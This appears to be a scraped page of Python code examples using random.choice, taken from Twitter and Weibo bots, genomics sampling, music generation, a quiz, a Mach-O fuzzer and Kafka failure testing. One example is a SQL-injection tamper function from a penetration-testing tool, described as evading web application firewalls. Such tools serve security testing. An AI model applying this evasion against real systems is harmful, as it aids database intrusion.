						resp = self._t.statuses.update(status=response,
							in_reply_to_status_id=tweet[u'id_str'],
							in_reply_to_user_id=tweet[u'user'][u'id_str'],
							in_reply_to_screen_name=tweet[u'user'][u'screen_name']
							)
						# Report to the console
						self._message(u'_autoreply', u'Posted reply: %s' % (response))
						# Store a copy of the latest outgoing tweet, for
						# debugging purposes
						self._lasttweetout = copy.deepcopy(resp)
					except Exception, e:
						self._error(u'_autoreply', u"Failed to post a reply: '%s'" % (e))
					# Release the twitter lock
					self._tlock.release()
					
					# Wait for the minimal tweeting delay.
					time.sleep(60.0*self._mindelay)

Example 16

Project: markovbot
Source File: markovbot.py
View license
	def _autotweet(self):
		
		"""Automatically tweets on a periodical basis.

		Runs on a background thread until self._tweetingthreadlives goes
		False; tweets are only posted while self._loggedin and
		self._autotweeting are set, with a jittered interval between posts.
		"""

		# Run indefinitively
		while self._tweetingthreadlives:

			# Wait a bit before rechecking whether tweeting should be
			# started. It's highly unlikely the bot will miss something if
			# it is a second late, and checking continuously is a waste of
			# resources.
			time.sleep(1)

			# Only start when the bot logs in to twitter, and when tweeting
			# is supposed to happen
			while self._loggedin and self._autotweeting:
				
				# Choose a random keyword
				kw = None
				if self._tweetingkeywords != None:
					if type(self._tweetingkeywords) in \
						[str, unicode]:
						kw = self._tweetingkeywords
					else:
						kw = random.choice(self._tweetingkeywords)
				
				# Choose the database to use. If the database should be
				# random, then randomly choose a non-empty database.
				if self._tweetingdatabase == u'random-database':
					database = random.choice(self.data.keys())
					while self.data[database] == {}:
						database = random.choice(self.data.keys())
					self._message(u'_autotweet', \
						u'Randomly chose database: %s' % (database))
				# If the database is a list of alternatives, randomly
				# select one.
				elif type(self._tweetingdatabase) in [list, tuple]:
					database = random.choice(self._tweetingdatabase)
				# If the specified database is a string, use it.
				elif type(self._tweetingdatabase) in [str, unicode]:
					database = copy.deepcopy(self._tweetingdatabase)
				# Fall back on the default option.
				else:
					self._message(u'_autotweet', \
						u"Could not recognise the type of database '%s'; using '%s' instead." % (self._tweetingdatabase, u'default'))
					database = u'default'

				# Construct a prefix for this tweet. We use the
				# specified prefix, which can also be None. Or
				# we randomly select one from a list of potential
				# prefixes.
				if self._tweetingprefix == None:
					prefix = copy.deepcopy(self._tweetingprefix)
				elif type(self._tweetingprefix) in [str, unicode]:
					prefix = copy.deepcopy(self._tweetingprefix)
				elif type(self._tweetingprefix) in [list, tuple]:
					prefix = random.choice(self._tweetingprefix)
				else:
					prefix = None
					# (Fixed: this message previously said "using no
					# suffix." although it reports on the prefix.)
					self._message(u'_autotweet', \
						u"Could not recognise the type of prefix '%s'; using no prefix." % (self._tweetingprefix))

				# Construct a suffix for this tweet. We use the
				# specified suffix, which can also be None. Or
				# we randomly select one from a list of potential
				# suffixes.
				if self._tweetingsuffix == None:
					suffix = copy.deepcopy(self._tweetingsuffix)
				elif type(self._tweetingsuffix) in [str, unicode]:
					suffix = copy.deepcopy(self._tweetingsuffix)
				elif type(self._tweetingsuffix) in [list, tuple]:
					suffix = random.choice(self._tweetingsuffix)
				else:
					suffix = None
					self._message(u'_autotweet', \
						u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetingsuffix))

				# Construct a new tweet
				newtweet = self._construct_tweet(database=database, \
					seedword=kw, prefix=prefix, suffix=suffix)

				# Acquire the twitter lock
				self._tlock.acquire(True)
				# Reply to the incoming tweet
				try:
					# Post a new tweet
					tweet = self._t.statuses.update(status=newtweet)
					# Report to the console
					self._message(u'_autotweet', \
						u'Posted tweet: %s' % (newtweet))
					# Store a copy of the latest outgoing tweet, for
					# debugging purposes
					self._lasttweetout = copy.deepcopy(tweet)
				except:
					# Reconnect to Twitter.
					self._twitter_reconnect()
					# Try to post again.
					try:
						# Post a new tweet
						tweet = self._t.statuses.update(status=newtweet)
						# Report to the console
						self._message(u'_autotweet', \
							u'Posted tweet: %s' % (newtweet))
						# Store a copy of the latest outgoing tweet,
						# for debugging purposes
						self._lasttweetout = copy.deepcopy(tweet)
					except Exception as e:
						self._error(u'_autotweet', u"Failed to post a tweet! Error: '%s'" % (e))
				# Release the twitter lock
				self._tlock.release()
				
				# Determine the next tweeting interval in minutes
				jitter = random.randint(-self._tweetingjitter, \
					self._tweetingjitter)
				interval = self._tweetinginterval + jitter
				
				# Sleep for the interval (in seconds, hence * 60)
				self._message(u'_autotweet', \
					u'Next tweet in %d minutes.' % (interval))
				time.sleep(interval*60)

Example 17

Project: OmicsIntegrator
Source File: sampling.py
View license
def rejection_sample_bg(fg_dict,organism,bins=100,num_samples=None,verbose=False,
                        bg_match_epsilon=1e-3) :
    '''Generate background sequences according to the size, distance from genes,
    and GC content distributions of the supplied foreground sequences.  *fg_dict*
    is a dictionary of <header>:<sequence> items, where the first part of the
    header must contain:

    >chrX:<start>-<end>

    *organism* is a string that will be used to call the *chipsequtil.get_org
    settings* function and uses the 'genome_dir' and 'annotation_path' keys.
    *bins* is the number of bins to use for representing the GC content
    distribution.  Function returns a dictionary of <header>:<sequence> items
    of generated background sequences.'''

    nib_db = NibDB(nib_dirs=[get_org_settings(organism)['genome_dir']])
    tss_fn = get_org_settings(organism)['annotation_path']
    tss = defaultdict(list)
    for rec in RefGeneFile(tss_fn) :
        tss[rec['chrom']].append((int(rec['txStart']),int(rec['txEnd']),))

    # for each peak find the chromosome, distance to nearest
    # gene, size of peaks in bases, and GC content
    num_samples = len(fg_dict) if not num_samples else num_samples
    dists,sizes=[],[]

    for header,seq in fg_dict.items() :

        # chromosome first field in fasta headers from bed2seq.bedtoseq
        chrom = header.split(':')[0]

        # adjust chromosomes in special cases
        if re.search('random',chrom.lower()) or chrom.lower() == 'chrm' :
            continue

        # start first int in second field of bed2seq.bedtoseq header
        start = int(header.split(':')[1].split('-')[0])
        midpoint = start + len(seq)/2

        # figure out which chromosome we're working on
        tss_chr = tss[chrom]

        # dsts_to_genes is the distance of this peak from all the genes, find minimum
        dists_to_genes = [(s[0]-midpoint) for s in tss_chr]
        try :
            min_dist = min(dists_to_genes,key=lambda x : abs(x))
            dists.append(min_dist)
        except :
            err_str = 'Warning: no genes were found for sequence with header' \
                         ' %s, not using to calculate distributions.\n'%header
            sys.stderr.write(err_str)

        # calculate # bases
        sizes.append(len(seq))

    # GC content distribution for the foreground sequences
    gc_dist = get_gc_content_distribution(fg_dict.values(),bins=bins)

    # max_gc is # peaks w/ highest GC content
    max_gc = max(gc_dist)

    # gene_starts is a list of all genes in (chromosome,gene start) tuples
    gene_starts=[]
    for key in tss.keys():
        chrom=key.split('chr')[-1]
        for x in tss[key]:
            gene_starts.append((key,x[0]))

    # encapsulated function for proposing sequences
    def propose_sequence(dists, gene_starts, sizes, nib_db) :
        # sample a random distance from the list of distances
        d = random.choice(dists)

        # pick a random gene
        chrom, coord = random.choice(gene_starts)

        # propose a starting point for the bg sequence
        midpoint = coord-d+random.randint(-100,100)

        # propose a size for the bg sequence
        size = random.choice(sizes)
        start = int(midpoint-int(size/2))
        stop = int(midpoint+int(size/2))

        #sys.stderr.write("%s:coord=%d size=%d midpoint=%d d=%d\n"%(chrom,coord,size,midpoint,d))
        # if start or stop are negative, skip and try again
        if start < 0 or stop < 0 : seq = None

        # randomly choose strand
        strand = '+' if random.random() > 0.5 else '-'

        # extract the proposed sequence
        try :
            nib_title, seq = nib_db.get_fasta(chrom,start,stop,strand)
        except IOError, e :
            if verbose : sys.stderr.write('IOError in NibDB, skipping: %s,%d-%d,%s\n'%(chrom,start,stop,strand))
            seq = None
        except NibException, e :
            if verbose : sys.stderr.write('NibDB.get_fasta error, %s\n'%e)
            seq = None

        header = '%s:%d-%d'%(chrom,start,stop)

        return header, seq


    # build gc content distribution based on seq length and
    # distance from TSS foreground distributions
    # keep sampling sequences until the distribution stops
    # changing a lot (KL divergence < epsilon)
    bg_gc_cnts = [1.]*bins
    converged = False
    epsilon = bg_match_epsilon
    if verbose : sys.stderr.write('Building empirical background GC content distribution\n')
    while not converged :

        # propose a sequence
        header, seq = propose_sequence(dists,gene_starts,sizes,nib_db)

        # sometimes this happens when there is an error, just try again
        if seq is None :
            continue

        # determine the GC bin for this sequence
        gc_content = get_gc_content(seq)
        gc_bin = -1
        for i in range(bins) :
            win_start = i/float(bins)
            win_end = (i+1)/float(bins)
            if gc_content >= win_start and gc_content < win_end :
                gc_bin = i
                break

        # update the gc content distribution
        sum_cnts = float(sum(bg_gc_cnts))
        if sum_cnts != 0 : # ! on first sequence

            # calculate the current distributions
            last_gc_p = map(lambda x:x/sum_cnts,bg_gc_cnts)
            bg_gc_cnts[gc_bin] += 1
            new_gc_p = map(lambda x:x/sum_cnts,bg_gc_cnts)

            # calculate the kl divergence between last distribution
            # and current one, stopping if less than epsilon
            kl_d = kl_divergence(new_gc_p,last_gc_p)
            if verbose : sys.stderr.write('dist to converge: %.3g\r'%(kl_d-epsilon))
            if kl_d < epsilon :
                converged = True

        else :
            bg_gc_cnts[gc_bin] += 1

    if verbose : sys.stderr.write('\ndone\n')

    # add pseudocounts to account for missing data in bg as to avoid
    # inappropriate scaling in rejection sampling step
    # the fg bin with the largest value that corresponds to an empty
    # bg bin is used to calculate the number of pseudocounts so that
    # the resulting bg bin has the same propotion of counts in it as
    # the original fg bin.  This is calculated as:
    #
    # x_{pseudo} = \frac{p_i\sum_{i=1}^{N}a_i}{1-p_iN}
    #
    # where p_i is the value of the max fg bin w/ zero in the bg bin
    # x_{pseudo} is added to every bin
    pseudocounts = 0
    for fg_i, bg_i in zip(gc_dist,bg_gc_cnts) :
        if fg_i != 0 and bg_i == 0 and fg_i*len(fg_dict) > pseudocounts :
            # if fg_i > 1/sum(bg_gc_cnts) this won't work, but that *shouldn't*
            # ever happen
            if fg_i >= 1./sum(bg_gc_cnts) :
                raise Exception('There was a numeric issue in the rejection sampling routine, please try it again')
            sys.stderr.write(str([fg_i,sum(bg_gc_cnts),len(bg_gc_cnts),1.*fg_i*len(bg_gc_cnts),bg_gc_cnts])+'\n')
            sys.stderr.flush()
            pseudocounts = (fg_i*sum(bg_gc_cnts))/(1-1.*fg_i*len(bg_gc_cnts))

    bg_gc_cnts = map(lambda x: x+pseudocounts/sum(bg_gc_cnts),bg_gc_cnts)
    bg_gc_dist = map(lambda x: x/sum(bg_gc_cnts),bg_gc_cnts)

    # last, find the multiplier that causes the background gc distribution to
    # envelope the foreground gc dist
    z_coeff = gc_dist[0]/bg_gc_dist[0]
    for fg_i, bg_i in zip(gc_dist[1:],bg_gc_dist[1:]) :
        z_coeff = max(z_coeff,fg_i/bg_i)
    bg_gc_dist = map(lambda x: x*z_coeff,bg_gc_dist)

    # start generating bg sequences
    bg_dict = {}

    bg_gcs,bg_sizes=[],[]

    # generate a bg sequence for every fg sequence
    for i in range(num_samples):
        if verbose : sys.stderr.write('%d/%d'%(i,num_samples))

        # propose sequences until one is accepted
        accepted_sequence = False
        while not accepted_sequence:
            if verbose : sys.stderr.write('.')

            # propose a sequence
            header, seq = propose_sequence(dists,gene_starts,sizes,nib_db)

            # problem occured in proposing sequence, just keep going
            if seq is None : continue

            # determine the GC bin for this sequence
            gc_content = get_gc_content(seq)
            gc_bin = -1
            for i in range(bins) :
                win_start = i/float(bins)
                win_end = (i+1)/float(bins)
                if gc_content >= win_start and gc_content < win_end :
                    gc_bin = i
                    continue

            # pick a uniform random number such that it does not exceed
            # the maximum GC content distribution over bins
            # if the random number is <= the GC content for this
            # proposed sequence, accept, otherwise reject
            r = random.random() * bg_gc_dist[gc_bin]
            if r > gc_dist[gc_bin] :
                continue
            else:
                bg_gcs.append(x)
                #bg_sizes.append(size)
                accepted_sequence = True
                bg_dict[header] = seq

        if verbose : sys.stderr.write('\r')
    return bg_dict

Example 18

Project: pablo
Source File: heuristics.py
View license
def build_bar(songs, n, prev_sample=None, coherent=True, tracks=None, bar_position=0, recur=0):
    """
    Builds a bar of n beats in length,
    where n >= the shortest sample length.

        e.g. if the samples are cut into bars of 8, 16, 32,
        then n must be >= 8.

    Bars are constructed by selecting a sample of length n
    or by placing two adjacent bars of length n/2. This structure
    *should* produce more coherent (less spastic) tracks.

        e.g a bar of length 16 can be created by two samples of length 8
        or one sample of length 16, if available.

    A bar is returned as a list of samples.

    If `coherent=True`, Pablo will try to build _coherent_ bars:

        - higher probability that the same sample will be re-played
        - higher probability that the next sample in the sequence will be played
        - lower probability that the next sample will be from a different song

    This assumes that the samples are in their chronological sequence.
    That is, that samples i and i+1 for a song are temporally adjacent.

    `tracks` defaults to no overlaid tracks; `recur` is accepted for
    backward compatibility but is currently unused.

    Returns a list of Samples.
    """
    # Guard against the shared-mutable-default pitfall: previously the
    # default was tracks=[], a single list shared across all calls.
    if tracks is None:
        tracks = []

    if len(tracks) > len(songs):
        raise Exception('Must have more songs available than overlaid tracks')

    # Remove any songs which are simultaneously playing in other tracks
    # over the length of this bar
    min_size = min(s.min_size for s in songs)
    invalid_songs = []
    for track in tracks:
        for i in range(n/min_size):
            invalid_songs.append(track[bar_position+i].song)
    valid_songs = [s for s in songs if s not in invalid_songs]

    # ugh, well we can overlap songs, I _guess_...
    if not valid_songs:
        valid_songs = [random.choice(songs)]

    # Find samples of length n
    full_bar_samples = {}
    for song in valid_songs:
        if n in song.sizes:
            full_bar_samples[song.name] = [s for s in song[n] if s is not None]

    min_size = min(s.min_size for s in valid_songs)

    if n < min_size:
        raise Exception('Can\'t create a bar shorter than the shortest sample')

    # If this is the smallest sample size,
    # we can only return full bars.
    # Otherwise, slightly favor complete bars, if available
    if n == min_size or (full_bar_samples and random.random() <= 0.6):
        if coherent:
            return _select_sample(full_bar_samples, n, prev_sample)
        else:
            song = random.choice(full_bar_samples.keys())
            return random.choice(full_bar_samples[song])

    # Otherwise, assemble the bar from sub-bars
    # NOTE(review): the recursive call does not forward `coherent`, so
    # sub-bars are always built coherently — confirm this is intended.
    bar = []
    length = 0
    while length < n:
        n_ = n/2
        bar += build_bar(songs, n_, prev_sample=prev_sample, bar_position=bar_position, tracks=tracks)
        bar_position += n_/min_size
        length += n_
        prev_sample = bar[-1]

    return bar

Example 19

Project: QRobot
Source File: robot.py
View license
def run():
    """Main bot loop: logs in to Weibo, posts scheduled/monitoring statuses,
    and replies to mentions.  Returns (via break) once per day so the caller
    can re-authorize; runs until then in a one-second polling loop.
    """
    client = login.login()
    # last processed status id, persisted across restarts
    lastid = loadLastId()
    inter = 50  # seconds since the last mention check (starts high so the first check runs immediately)

    # post a test status on startup
    client.statuses.update.post(status="test...!") 
    log = "服务器再次启动! "
    print log
   
    while True:
        try:
            inter += 1  # one more second elapsed
            # current minute+second and hour, used as schedule triggers
            now = time.strftime('%M%S',time.localtime(time.time()))
            hour = time.strftime('%H',time.localtime(time.time()))

            # break out daily at 01:00:00 so the caller can re-authorize
            if hour == '01' and now == '0000':
                break

            # The Weibo API cannot post self-only statuses, so this status is
            # restricted to "close friends" (visible=2) — in practice a second
            # account of the author's, used to monitor CPU temperature and uptime.
            if hour == '00' and now == '0000':
                print "sending a monitor weibo"
                monitor_info = monitor.monitor_cpu_temp()
                monitor_info += monitor.monitor_runtime()
                monitor_info += monitor.monitor_http()
                try:
                    client.statuses.update.post(status=monitor_info, visible = 2)
                except:
                    pass

                log = "Send a monitor weibo succesfully! 时分秒:%s%s \n" %(hour,now)
                print log
                storeLog(log)


            # post a scheduled status at minute 45:00 of the listed hours
            if now == '4500' and hour in ['07', '12', '11', '17','18','20','22','23']:
                print 'sending a normal weibo'
                monitor_info = ""
                # randomly pick which monitoring info (if any) to append
                if random.choice(range(2)):
                    monitor_info += monitor.monitor_cpu_temp()
                elif random.choice(range(2)):
                    monitor_info += monitor.monitor_http()
                else:
                    monitor_info += monitor.monitor_runtime()

                greeting = ""
                greeting += greet.hello(hour)
                myPic = loadpic.pic()
                
                # 50/50: greeting only, or greeting plus monitoring info
                if random.choice(range(2)):
                    content = '%s' %(greeting)
                else:
                    content = '%s%s' %(greeting, monitor_info)
                try:
                    # randomly post with or without a picture (50/50)
                    if random.choice(range(2)):
                        client.statuses.update.post(status=content)
                    else:
                        client.statuses.upload.post(status=content, pic = myPic)                
                except Exception, e:
                    print e 

                myPic.close()
                
                log = "Send a normal weibo succesfully! 时分秒:%s%s \n" %(hour,now)
                print log
                storeLog(log)

                time.sleep(1)

            # every ~50s, reply to the latest mentions: comment on original
            # posts that @-mention the bot, and reply to comments that do
            if inter > 50:
                try:                    
                    # comment on the newest ORIGINAL posts that mention me

                    # fetch the id of the newest original mention
                    lastid = loadLastId()
                    mentions = client.statuses.mentions.get(since_id = lastid, filter_by_type = 1)
                    for weiboInfo in mentions['statuses']:
                        lastid = weiboInfo['id']
                        print lastid
                        # persist immediately so a crash does not re-reply
                        storeLastId(lastid)

                        myComment = ""
                        myComment = greet.comment()
                        client.comments.create.post(id = lastid, comment = myComment)
                        log = 'send a comment successfully! 时分秒:%s%sid:%d comment:%s \n' %(hour, now, lastid, myComment)
                        print log
                        storeLog(log)

                    # reply to the newest COMMENTS that mention me
                    lastCommentid = loadLastId(False)
                    mentions = client.comments.mentions.get(since_id = lastCommentid)
                    for weiboInfo in mentions['comments']:
                        lastCommentid = weiboInfo['id']  # comment id
                        lastPostId = weiboInfo['status']['id']  # id of the status the comment belongs to
                        print "评论的id:%d 微博的id:%d" % (lastCommentid,lastPostId)
                        storeLastId(lastCommentid, False)

                        myComment = greet.comment()                       
                        client.comments.reply.post(id = lastPostId, cid = lastCommentid, comment = myComment)
                        # NOTE(review): this log line formats `lastid` (the
                        # original-post loop's id), not lastCommentid/lastPostId —
                        # looks like a copy-paste slip; confirm intent upstream.
                        log = 'replay a comment successfully! 时分秒:%s%s id:%d comment:%s \n' %(hour, now, lastid, myComment)
                        print log
                        storeLog(log)

                except Exception, e:
                    print e

                inter = 0




            time.sleep(1)  # pause one second per loop iteration



        except Exception, e:
            print e

Example 20

Project: golismero
Source File: space2mssqlblank.py
View license
def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

    Requirement:
        * Microsoft SQL Server

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005

    Notes:
        * Useful to bypass several web application firewalls

    NOTE(review): the doctest output below was generated with Python 2's
    PRNG; Python 3's random.choice draws differently for the same seed,
    so the exact value differs there (the set of substituted characters
    is the same).

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Eid%0DFROM%07users'
    """

    # ASCII table:
    #   SOH     01      start of heading
    #   STX     02      start of text
    #   ETX     03      end of text
    #   EOT     04      end of transmission
    #   ENQ     05      enquiry
    #   ACK     06      acknowledge
    #   BEL     07      bell
    #   BS      08      backspace
    #   TAB     09      horizontal tab
    #   LF      0A      new line
    #   VT      0B      vertical TAB
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   SO      0E      shift out
    #   SI      0F      shift in
    # '%0A' (LF) is deliberately last so blanks[:-1] can exclude it.
    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace, end = False, False, False, False

        # enumerate() instead of Python-2-only xrange() indexing.
        for i, ch in enumerate(payload):
            if not firstspace:
                # The very first whitespace character is always replaced.
                if ch.isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
                    continue

            elif ch == '\'':
                quote = not quote

            elif ch == '"':
                doublequote = not doublequote

            elif ch == '#' or payload[i:i + 3] == '-- ':
                # Inside a trailing SQL comment from here on.
                end = True

            elif ch == " " and not doublequote and not quote:
                if end:
                    # Avoid LF after a comment marker: a newline would
                    # terminate the comment.
                    retVal += random.choice(blanks[:-1])
                else:
                    retVal += random.choice(blanks)

                continue

            retVal += ch

    return retVal

Example 21

Project: deepjazz
Source File: grammar.py
View license
def unparse_grammar(m1_grammar, m1_chords):
    """Reconstruct a music21 Voice from an abstract grammar string.

    Each space-separated element of *m1_grammar* has the shape
    "<category>,<duration>[,<low-interval>,<high-interval>]" where the
    category is 'R' (rest), 'C' (chord tone), 'S' (scale tone) or
    'A'/'X' (both treated as approach tones).  Notes/rests are inserted
    into a stream.Voice at cumulative offsets; *m1_chords* supplies the
    harmonic context (most recent chord at or before each offset).

    Returns the populated stream.Voice.
    """

    def _pick_tone(is_tone, last_chord, prev_element, low_pitch, num_notes):
        # Collect every pitch in [low_pitch, low_pitch + num_notes) that
        # satisfies the category predicate.  (range() replaces the
        # Python-2-only xrange() used previously.)
        candidates = []
        for step in range(num_notes):
            cand = note.Note(low_pitch.transpose(step).simplifyEnharmonic())
            if is_tone(last_chord, cand):
                candidates.append(cand)
        if len(candidates) > 1:
            # Avoid repeating the previous pitch when alternatives exist.
            return random.choice([c for c in candidates
                                  if c.nameWithOctave != prev_element.nameWithOctave])
        elif len(candidates) == 1:
            return candidates[0]
        # No candidate in range: move a whole step up or down from prev.
        return prev_element.transpose(random.choice([-2, 2]))

    m1_elements = stream.Voice()
    currOffset = 0.0  # running insert offset; advanced before each insert
    prevElement = None
    for grammarElement in m1_grammar.split(' '):
        terms = grammarElement.split(',')
        currOffset += float(terms[1])  # works just fine

        # Case: it's a rest. Just append.
        if terms[0] == 'R':
            m1_elements.insert(currOffset, note.Rest(quarterLength=float(terms[1])))
            continue

        # Most recent chord at/before this offset (needed for chord/scale/
        # approach tone decisions).  If none precedes, force the first
        # chord's offset to 0.0 and retry.
        try:
            lastChord = [c for c in m1_chords if c.offset <= currOffset][-1]
        except IndexError:
            m1_chords[0].offset = 0.0
            lastChord = [c for c in m1_chords if c.offset <= currOffset][-1]

        if len(terms) == 2:
            # No < > interval bounds -- usually the first note (no
            # precedent) or a note following a rest: generate a tone
            # directly from the chord context.
            if terms[0] == 'C':
                insertNote = __generate_chord_tone(lastChord)
            elif terms[0] == 'S':
                insertNote = __generate_scale_tone(lastChord)
            else:
                # 'A' and 'X' are both handled as approach tones for now.
                insertNote = __generate_approach_tone(lastChord)

            insertNote.quarterLength = float(terms[1])
            if insertNote.octave < 4:
                insertNote.octave = 4
            m1_elements.insert(currOffset, insertNote)
            prevElement = insertNote
        else:
            # < > interval bounds relative to the previous note constrain
            # the pitch search range.
            interval1 = interval.Interval(terms[2].replace("<", ''))
            interval2 = interval.Interval(terms[3].replace(">", ''))
            if interval1.cents > interval2.cents:
                upperInterval, lowerInterval = interval1, interval2
            else:
                upperInterval, lowerInterval = interval2, interval1
            lowPitch = interval.transposePitch(prevElement.pitch, lowerInterval)
            highPitch = interval.transposePitch(prevElement.pitch, upperInterval)
            numNotes = int(highPitch.ps - lowPitch.ps + 1)  # for range(s, e)

            # Single selection helper replaces the three near-identical
            # C/S/A blocks of the original; only the predicate differs.
            if terms[0] == 'C':
                predicate = __is_chord_tone
            elif terms[0] == 'S':
                predicate = __is_scale_tone
            else:
                predicate = __is_approach_tone
            insertNote = _pick_tone(predicate, lastChord, prevElement,
                                    lowPitch, numNotes)

            if insertNote.octave < 3:
                insertNote.octave = 3
            insertNote.quarterLength = float(terms[1])
            m1_elements.insert(currOffset, insertNote)

            # update the previous element.
            prevElement = insertNote

    return m1_elements

Example 22

Project: nightmare
Source File: macho_mutator.py
View license
  def do_fuzz_headers(self):
    """Apply one random mutation to a randomly chosen Mach-O header.

    Picks a header from self.macho.headers and a sub-property name from
    self.fuzz_sub_properties["headers"], then overwrites one structure
    field with a random value (via exec on a generated assignment).  A
    human-readable description is appended to self.changes and a dedup
    key to self.change_list; the description is removed again whenever
    the chosen target turns out to be banned, already mutated, or of an
    unsupported type.

    NOTE(review): header/command objects presumably come from macholib
    (ctypes-style structures exposing `_fields_`) -- confirm against the
    module's imports.
    """
    # Select a random header
    header = random.choice(self.macho.headers)
    idx = self.macho.headers.index(header)
    # Open a new change record; deleted below if nothing gets applied.
    self.changes.append(["Header %d" % idx])
    prop = random.choice(self.fuzz_sub_properties["headers"])

    if prop == "header":
      # Mutate one field of the top-level mach header structure.
      fields = random.choice(header.header._fields_)
      field = fields[0]

      change_name = "header %d field %s" % (idx, field)
      if change_name in self.change_list or field in BANNED_FIELDS:
        #print "Ignoring already applied change %s" % change_name
        del self.changes[len(self.changes)-1]
        return

      self.changes[len(self.changes)-1].append("Field %s" % field)
      # exec on a generated assignment; the field name comes from the
      # structure's own _fields_ metadata, not from external input.
      l = "header.header.%s = %d" % (field, get_random_value(fields[1]))
      exec(l)

      self.change_list.append(change_name)
    elif prop == "commands":
      # Mutate one load command (or one of its sub-structures).
      cmd = random.choice(header.commands)
      idx = header.commands.index(cmd)
      self.changes[len(self.changes)-1].append("Command %d" % idx)

      subidx = random.randint(0, len(cmd)-1)
      subcmd = cmd[subidx]

      if '_fields_' in dir(subcmd):
        if len(subcmd._fields_) > 0:
          fields = random.choice(subcmd._fields_)
          field = fields[0]
          self.changes[len(self.changes)-1].append("Field %s" % field)
          # Only assign when the current value's type is one we know how
          # to generate a random replacement for.
          str_type = str(type(eval("subcmd.%s" % field)))
          if str_type in SUPPORTED_FIELD_TYPES:
            l = "subcmd.%s = " % field
            l += str(get_random_value(fields[1]))
            exec(l)
          else:
            #print "Ignoring unsupported field type", str_type, field
            del self.changes[len(self.changes)-1]
        else:
          print "Ignoring empty subcmd", subcmd
          del self.changes[len(self.changes)-1]
      elif type(subcmd) is str:
        #print "Ignoring unsupported (by macholib) string sub-command"
        del self.changes[len(self.changes)-1]
      else:
        print type(subcmd), subcmd
        # A list of structures: mutate one field of one random element.
        if type(subcmd) is list and len(subcmd) > 0:
          field = random.choice(subcmd)
          subidx = subcmd.index(field)
          self.changes[len(self.changes)-1].append("List element %d" % subcmd.index(field))

          fields = random.choice(field._fields_)
          field_name = fields[0]
          self.changes[len(self.changes)-1].append("Field %s" % field_name)

          l = "field.%s = " % field_name
          l += str(get_random_value(fields[1]))
          exec(l)
        else:
          del self.changes[len(self.changes)-1]
      #self.changes[len(self.changes)-1].append("Sub-command %d" % sub_idx)
    elif prop == "headers":
      del self.changes[len(self.changes)-1]
      #print "Not yet supported headers"
      #raise Exception("Implement headers")
    else:
      del self.changes[len(self.changes)-1]

Example 23

Project: learning-greek
Source File: alphabet.py
View license
    def construct_quiz(self):

        pronunciation = [
            (u"Α", "ah"),
            (u"Β", "v"),
            (u"Γ", "gh, y, ng"),
            (u"Δ", "dh"),
            (u"Ε", u"ĕ"),
            (u"Ζ", "z"),
            (u"Η", u"ē"),
            (u"Θ", "th"),
            (u"Ι", "i, y"),
            (u"Κ", "k"),
            (u"Λ", "l"),
            (u"Μ", "m"),
            (u"Ν", "n"),
            (u"Ξ", "ks"),
            (u"Ο", "o"),
            (u"Π", "p"),
            (u"Ρ", "r"),
            (u"Σ", "s"),
            (u"Τ", "t"),
            (u"Υ", u"ü, v"),
            (u"Φ", "f"),
            (u"Χ", "x, ch"),
            (u"Ψ", "ps"),
            (u"Ω", "o"),
            (u"ΑΙ", u"ĕ"),
            (u"ΕΙ", "i"),
            (u"OI", u"ü"),
            (u"ΟΥ", "u"),
            (u"ΑΥ", "av, af"),
            (u"ΕΥ", u"ĕv, ĕf"),
            (u"ΗΥ", "ev, ef"),
            (u"Αι", u"ĕ"),
            (u"Ει", "i"),
            (u"Oι", u"ü"),
            (u"Ου", "u"),
            (u"Αυ", "av, af"),
            (u"Ευ", u"ĕv, ĕf"),
            (u"Ηυ", "ev, ef"),
            (u"ΓΓ", "ngg"),
            (u"ΓΚ", "ngk"),
            (u"ΓΧ", "ngch"),
            (u"α", "ah"),
            (u"β", "v"),
            (u"γ", "gh, y, ng"),
            (u"δ", "dh"),
            (u"ε", u"ĕ"),
            (u"ζ", "z"),
            (u"η", u"ē"),
            (u"θ", "th"),
            (u"ι", "i, y"),
            (u"κ", "k"),
            (u"λ", "l"),
            (u"μ", "m"),
            (u"ν", "n"),
            (u"ξ", "ks"),
            (u"ο", "o"),
            (u"π", "p"),
            (u"ρ", "r"),
            (u"σ", "s"),
            (u"ς", "s"),
            (u"τ", "t"),
            (u"υ", u"ü, v"),
            (u"φ", "f"),
            (u"χ", "x, ch"),
            (u"ψ", "ps"),
            (u"ω", "o"),
            (u"αι", u"ĕ"),
            (u"ει", "i"),
            (u"οι", u"ü"),
            (u"ου", "u"),
            (u"αυ", "av, af"),
            (u"ευ", u"ĕv, ĕf"),
            (u"ηυ", "ev, ef"),
            (u"γγ", "ngg"),
            (u"γκ", "ngk"),
            (u"γχ", "ngch"),
        ]

        questions = []

        while len(questions) < 10:
            letter1 = random.choice(pronunciation)
            letter2 = random.choice(pronunciation)
            if letter1[1] == letter2[1]:
                continue

            choices = random.sample([letter1, letter2], 2)
            question = random.choice(choices)

            if question[1] in [q[2] for q in questions]:
                continue

            questions.append((question[0], [choice[1] for choice in choices], question[1]))

        return questions

Example 24

Project: simoorg
Source File: KafkaTopology.py
View license
    def get_random_node(self):
        """
            Get a hostname of broker to induce failure on
            Args:
                None
            Return:
                hostname
        """
        # Draw one failure spec from the plan; its node type decides how
        # the target host is resolved.
        failure = random.choice(self.plan)

        if failure.get_node_type() == "RANDOM_BROKER":
            # Resolve topic/partition (random or as specified), then pick
            # a random in-sync replica of that partition.
            if failure.get_topic() is None:
                topic = self.helper.get_topic()
                partition = self.helper.get_partition(topic)
                message = ("Selecting a random broker"
                           " for a Random Topic : {0},"
                           " Random Partition : {1}").format(topic, partition)
            else:
                topic = failure.get_topic()
                # check if the partition is specified for the topic
                if failure.get_partition() is not None:
                    partition = failure.get_partition()
                    message = ("Selecting a random broker"
                               " for a Specified Topic : {0},"
                               " Specified Partition : {1}").format(topic,
                                                                    partition)
                else:
                    # get a random partition
                    partition = self.helper.get_partition(topic)
                    message = ("Selecting a random broker"
                               " for a Specified Topic : {0},"
                               " Random Partition : {1}").format(topic,
                                                                 partition)
            self.logger_instance.logit("INFO", message, log_level="VERBOSE")
